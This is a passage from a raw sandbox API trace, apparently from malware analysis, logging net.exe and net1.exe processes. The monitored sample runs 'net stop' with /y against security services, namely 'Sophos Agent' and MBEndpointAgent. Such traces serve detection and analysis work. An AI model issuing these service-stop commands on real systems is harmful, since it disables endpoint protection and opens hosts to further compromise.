LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x16 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0210.554] LocalFree (hMem=0x683f30) returned 0x0 [0210.554] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x11 [0210.554] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x12 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0xf [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x17 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x18 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x2a [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0210.555] LocalFree (hMem=0x683f30) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x58 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0210.555] LocalFree (hMem=0x685820) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x184 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0210.555] LocalFree (hMem=0x685820) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xc7 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0210.555] LocalFree (hMem=0x685820) returned 0x0 [0210.555] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x47 [0210.555] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0210.555] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xc2 [0210.556] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x319 [0210.556] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x483 [0210.556] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xa86 [0210.556] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0x54 [0210.556] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.堠h倫.") returned 0xad [0210.556] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x2e [0210.556] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0210.556] LocalFree (hMem=0x683f30) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x7d [0210.556] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0210.556] LocalFree (hMem=0x685820) returned 0x0 [0210.556] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x26 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x19 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x1b [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0xbe [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0210.557] LocalFree (hMem=0x685820) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x33 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x19 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0xc1 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0210.557] LocalFree (hMem=0x685820) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x16 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x33 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="堠h⡋瓢滛.㼰h倫.") returned 0x234 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0210.557] LocalFree (hMem=0x685820) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.堠h倫.") returned 0x13 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.557] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.557] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.557] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x16 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x11 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x14 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x12 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0xf [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x17 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x18 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x2a [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0210.558] LocalFree (hMem=0x683f30) returned 0x0 [0210.558] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ef9e0, nSize=0x0, Arguments=0x2ef9dc | out: lpBuffer="㼰h⡋瓢滛.㼰h倫.") returned 0x15 [0210.558] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0210.558] GetFileType (hFile=0x26c) returned 0x3 [0210.558] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x2ef9f8 | out: lpMode=0x2ef9f8) returned 0 [0210.559] GetConsoleOutputCP () returned 0x1b5 [0210.559] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0210.559] malloc (_Size=0x16) returned 0x172700 [0210.559] GetConsoleOutputCP () returned 0x1b5 [0210.559] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x172700, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0210.559] WriteFile (in: hFile=0x26c, lpBuffer=0x172700, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2ef9fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ef9fc, lpOverlapped=0x0) returned 0 [0210.559] free (_Block=0x172700) [0210.559] LocalFree (hMem=0x683f30) returned 0x0 [0210.560] NetApiBufferFree (Buffer=0x681c80) returned 0x0 [0210.560] NetApiBufferFree (Buffer=0x681c98) returned 0x0 [0210.560] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos AgentΓÇ¥ /y" [0210.560] exit (_Code=1) Process: id = "286" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6378f000" os_pid = "0x444" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MBEndpointAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 459 os_tid = 0x4fc Process: id = "287" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4ee84000" os_pid = "0x798" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "286" os_parent_pid = "0x444" cmd_line = "C:\\Windows\\system32\\net1 stop MBEndpointAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 460 os_tid = 0x230 [0210.702] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afdd8 | out: lpSystemTimeAsFileTime=0x1afdd8*(dwLowDateTime=0x46c774e0, dwHighDateTime=0x1d57a87)) [0210.702] GetCurrentProcessId () returned 0x798 [0210.702] GetCurrentThreadId () returned 0x230 [0210.702] GetTickCount () returned 0x116e428 [0210.702] QueryPerformanceCounter (in: lpPerformanceCount=0x1afdd0 | out: lpPerformanceCount=0x1afdd0*=33098695603) returned 1 [0210.703] GetModuleHandleA (lpModuleName=0x0) returned 0x640000 [0210.703] __set_app_type (_Type=0x1) [0210.703] __p__fmode () returned 0x74eb31f4 [0210.703] __p__commode () returned 0x74eb31fc [0210.703] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x64ffe6) returned 0x0 [0210.703] __getmainargs (in: _Argc=0x659064, _Argv=0x65906c, _Env=0x659068, _DoWildCard=0, _StartInfo=0x659024 | out: _Argc=0x659064, _Argv=0x65906c, _Env=0x659068) returned 0 [0210.703] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.703] GetConsoleOutputCP () returned 0x1b5 [0210.703] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x659080 | out: lpCPInfo=0x659080) returned 1 [0210.703] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.706] sprintf_s (in: _DstBuf=0x1afd90, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0210.706] setlocale (category=0, locale=".437") returned="English_United States.437" [0210.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0210.708] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0210.708] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBEndpointAgent /y" [0210.708] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afb5c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0210.708] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x72) returned 0x42f788 [0210.709] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0210.709] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afd60 | out: Buffer=0x1afd60*=0x431c78) returned 0x0 [0210.709] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afd60 | out: Buffer=0x1afd60*=0x431c90) returned 0x0 [0210.709] _fileno (_File=0x74eb2900) returned -2 [0210.709] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0210.709] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0210.709] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0210.709] _wcsicmp (_String1="config", _String2="stop") returned -16 [0210.709] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0210.709] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0210.709] _wcsicmp (_String1="file", _String2="stop") returned -13 [0210.709] _wcsicmp (_String1="files", _String2="stop") returned -13 [0210.709] _wcsicmp (_String1="group", _String2="stop") returned -12 [0210.709] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0210.709] _wcsicmp (_String1="help", _String2="stop") returned -11 [0210.709] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0210.709] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0210.709] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0210.709] _wcsicmp (_String1="session", _String2="stop") returned -15 [0210.709] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0210.709] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0210.709] _wcsicmp (_String1="share", _String2="stop") returned -12 [0210.709] _wcsicmp (_String1="start", _String2="stop") returned -14 [0210.709] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0210.710] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0210.710] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0210.710] _wcsicmp (_String1="accounts", _String2="MBEndpointAgent") returned -12 [0210.710] _wcsicmp (_String1="computer", _String2="MBEndpointAgent") returned -10 [0210.710] _wcsicmp (_String1="config", _String2="MBEndpointAgent") returned -10 [0210.710] _wcsicmp (_String1="continue", _String2="MBEndpointAgent") returned -10 [0210.710] _wcsicmp (_String1="cont", _String2="MBEndpointAgent") returned -10 [0210.710] _wcsicmp (_String1="file", _String2="MBEndpointAgent") returned -7 [0210.710] _wcsicmp (_String1="files", _String2="MBEndpointAgent") returned -7 [0210.710] _wcsicmp (_String1="group", _String2="MBEndpointAgent") returned -6 [0210.710] _wcsicmp (_String1="groups", _String2="MBEndpointAgent") returned -6 [0210.710] _wcsicmp (_String1="help", _String2="MBEndpointAgent") returned -5 [0210.710] _wcsicmp (_String1="helpmsg", _String2="MBEndpointAgent") returned -5 [0210.710] _wcsicmp (_String1="localgroup", _String2="MBEndpointAgent") returned -1 [0210.710] _wcsicmp (_String1="pause", _String2="MBEndpointAgent") returned 3 [0210.710] _wcsicmp (_String1="session", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="sessions", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="sess", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="share", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="start", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="stats", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="statistics", _String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="stop", 